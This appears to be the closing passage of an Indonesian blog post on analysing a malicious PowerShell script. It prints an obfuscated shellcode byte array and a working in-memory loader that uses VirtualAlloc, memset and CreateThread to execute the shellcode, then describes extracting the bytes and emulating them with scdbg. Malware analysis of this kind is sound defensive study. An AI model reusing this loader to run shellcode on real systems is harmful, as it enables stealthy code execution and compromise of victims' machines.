,0x00,0x00,0x00,0x00,0x00,0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,<#ubx#>0x00,0x3C,0x00,0x3C,0x00,0x3A,0x00,0x3A,0x00,0x3E,0x00,0x3E,0x00,0x73,0x00,0x68,0x00,<#jc#>0x65,0x00,0x6C,0x00,0x6C,0x00,0x72,0x00,0x6D,0x00,0x3C,0x00,0x65,0x00,0x6B,0x00,0x63,0x00,0x65,0x00,0x3E,0x00,0x72,0x00,0x6D,0x00,<#sxr#>0x00,0x00,0x00,0x00,0x00,<#jd#>0x00,0x00,0x00,0x00,0x00,<#ora#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#wt#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#rea#>0x00,0x00,0x00,0x1F,0x00,0x00,0x00,0x00,0xAA,0x06,0x00,0x55,0x8B,0xEC,0x60,0x8B,0x7D,0x08,0x8B,0x75,0x0C,<#pyc#>0x8B,0x4D,0x10,0xF3,0xA4,0x61,0x5D,0xC2,0x0C,0x00,0x38,0xDB,0xE2,<#gb#>0x50,0xA3,0x70,0x80,0x60,0x41,0xF7,0x49,0xB3,0x5A,0xE1,0x53,0xD1,0xBC,0xB4,0x6E,0xB0,0x74,0x98,0xB4,0xF5,0x3C,0x6C,0x81,0x3D,0x12,0xB7,<#zg#>0xE9,0xF5,0xC2,0x34,0x23,0xA5,0x4E,0xD7,0x50,0x8D,0x7B,0x85,0xBB,0x19,0x00,0xD8,0x76,0x7F,0x09,0xB5,0xD3,0x86,0x14,0x82,<#ir#>0x44,0x59,0x5F,<#hld#>0x43,0x87,0xCB,<#wxa#>0x68,0xF6,0x32,0x8F,0x2E,0xEA,0x06,0x31,0x45,0xF0,<#oaw#>0x91,0xDA,0xDF,0x95,0x1F,0x38,<#vm#>0x5F,0xDA,0xE1,0xF4,0x1F,0x0D,0xE4,0xB7,<#frx#>0x6B,0xAB,0x3A,0x96,0xF8,0x8A,0x5A;
#wgtrs
$pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
#ykcmdtyr
if($pr -ne 0){$memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
#mmaai
for ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)};
#tsaoik
([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
#wpzomec
}sleep(1200);}catch{}exit;
#dwkjttuue
#ysiuayivua

Saya selanjutnya menyalin isi variabel $sc32, menempelkannya ke file bernama sc.bin. Saya kemudian membersihkan shellcode dengan menghapus entri seperti <#misalnya#> mengambil keuntungan dari sed. Pada akhirnya, produk jadi tampak seperti.

Pada titik ini, kita melihat shellcode berinteraksi dengan registri. Namun, kami tidak memiliki bukti kunci tertentu yang sedang diakses. Ini karena shellcode mengharapkan parameter yang menunjuk ke alamatnya di memori. Inilah cara yang disediakan melalui scdbg.

Itu saja untuk saya yang satu ini. Saya mencapai tujuan pembelajaran saya.

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.